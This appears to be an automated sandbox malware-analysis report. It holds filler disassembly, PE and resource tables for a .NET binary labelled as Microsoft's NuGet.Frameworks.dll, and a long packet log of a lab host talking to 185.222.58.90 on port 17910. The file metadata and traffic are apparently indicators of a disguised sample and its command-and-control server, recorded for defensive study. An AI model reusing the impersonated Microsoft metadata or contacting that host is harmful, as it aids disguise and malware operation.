                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xee9d80x4a.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xf00000x35b58.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1260000xc.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xeea220x38.text
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x20000xecad40xecc00False0.588961028247data7.11216408113IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0xf00000x35b580x35c00False0.443722747093data6.13223538227IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x1260000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountry
                                                                                  IBC0xf02d40x44fedata
                                                                                  RT_ICON0xf47d40x96b5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                  RT_ICON0xfde8c0x10828dBase III DBT, version number 0, next free block index 40
                                                                                  RT_ICON0x10e6b40x94a8data
                                                                                  RT_ICON0x117b5c0x5488data
                                                                                  RT_ICON0x11cfe40x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                                  RT_ICON0x12120c0x25a8data
                                                                                  RT_ICON0x1237b40x10a8data
                                                                                  RT_ICON0x12485c0x988data
                                                                                  RT_ICON0x1251e40x468GLS_BINARY_LSB_FIRST
                                                                                  RT_GROUP_ICON0x12564c0x84data
                                                                                  RT_VERSION0x1256d00x488data
                                                                                  DLLImport
                                                                                  mscoree.dll_CorExeMain
                                                                                  DescriptionData
                                                                                  Translation0x0000 0x04b0
                                                                                  LegalCopyright Microsoft Corporation. All rights reserved.
                                                                                  Assembly Version5.6.0.5
                                                                                  InternalNameNuGet.Frameworks.dll
                                                                                  FileVersion5.6.0.6591
                                                                                  CompanyNameMicrosoft Corporation
                                                                                  CommentsNuGet's understanding of target frameworks.
                                                                                  ProductNameNuGet
                                                                                  ProductVersion5.6.0-rtm.6591+636570e68732c1f718ede9ca07802d7b1cc69aa0.636570e68732c1f718ede9ca07802d7b1cc69aa0
                                                                                  FileDescriptionNuGet.Frameworks
                                                                                  OriginalFilenameNuGet.Frameworks.dll
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 25, 2022 05:54:34.804373980 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:34.840136051 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:34.840245962 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:35.038233042 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:35.124947071 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:35.386113882 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:35.386611938 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:35.465347052 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:35.616060972 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:35.717648029 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:42.240025043 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:42.325726032 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:42.592434883 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:42.593358040 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:42.684371948 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:42.723193884 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:42.723258972 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:42.723299026 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:42.723339081 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:54:42.723364115 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:54:42.724369049 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.662625074 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.663996935 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.690510035 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.690692902 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.691005945 CEST1791049739185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.691071033 CEST4973917910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.701167107 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.728950977 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.730226040 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.756819010 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.756861925 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.757016897 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.757106066 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.783325911 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.783456087 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.783543110 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.783726931 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.783746004 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.783869982 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.783940077 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.784049988 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.784213066 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.784311056 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.809860945 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.810033083 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.810046911 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.810168028 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.810214043 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.810353041 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.810587883 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.810703039 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.810785055 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.810899973 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.836679935 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.836823940 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.836910009 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.837018967 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.837037086 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.837145090 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.837232113 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.837337971 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.837466955 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.837594986 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.837738037 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.837837934 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.838054895 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.838170052 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.838236094 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.838354111 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.838499069 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.838572025 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.863331079 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.863552094 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.863555908 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.863740921 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.863745928 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.863903046 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.863929987 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.864089012 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.864263058 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.864552021 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.864697933 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.864752054 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.864865065 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.864970922 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.865107059 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.865294933 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.865452051 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.865572929 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.865698099 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.865776062 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.865900993 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.865984917 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.866108894 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.866339922 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.866489887 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.866492033 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.866620064 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.866780043 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.866923094 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.867069960 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.867217064 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.867265940 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.867497921 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.867535114 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.867645979 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.890280008 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890316963 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890496969 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890518904 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890537024 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890556097 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890573978 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890580893 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.890652895 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890676022 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890712023 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.890752077 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.890779018 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.890785933 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.891087055 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.891396999 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.891577005 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.891906023 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.891922951 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892051935 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892100096 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892117023 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892206907 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892226934 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892246008 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892262936 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892282009 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892299891 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892319918 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892339945 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892416000 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892433882 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892574072 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892662048 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892680883 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892699957 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.892877102 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.893171072 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.893371105 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.893611908 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.893866062 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.906907082 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.906958103 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.906980991 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.907005072 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.907030106 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.907056093 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.907082081 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913584948 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913630009 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913660049 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913687944 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913713932 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913742065 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913768053 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.913824081 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.914155006 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.917100906 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.917314053 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.917555094 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.917891026 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.918191910 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.918447018 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.918533087 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.918710947 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.918787003 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.918889046 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.918981075 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.919015884 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.945106983 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.945152998 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.945305109 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.945353031 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.945378065 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.945466995 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.945642948 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.945750952 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.945916891 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.946012974 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.946069956 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.946154118 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.946342945 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.946434975 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.946583033 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.946696997 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.946892023 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.946985960 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.947118998 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.947194099 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.947350025 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.947448015 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.947662115 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.947742939 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.947849035 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.947920084 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.948117018 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.948204041 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.948343992 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.948427916 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.948662996 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.948688984 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.948715925 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.948731899 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.948741913 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.948755980 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.948792934 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.948853970 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.948987007 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.949013948 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.949042082 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.949067116 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.949094057 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.949127913 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.949147940 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.949165106 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.949193001 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.949218035 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.949224949 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.949244976 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.949245930 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.949273109 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.949274063 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.949296951 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.949299097 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.949331999 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.949350119 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.971735001 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.971785069 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.971815109 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.971839905 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.971868992 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.971896887 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.971921921 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.972013950 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.972074986 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.972084999 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.972107887 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.972136021 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.972145081 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.972162962 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.972189903 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.972203016 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.972218037 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.972227097 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.972270012 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.972456932 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.972506046 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.972520113 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.972546101 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.972548962 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.972573996 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.972604990 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:06.972610950 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.972629070 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:06.972634077 CEST1791049750185.222.58.90192.168.2.3
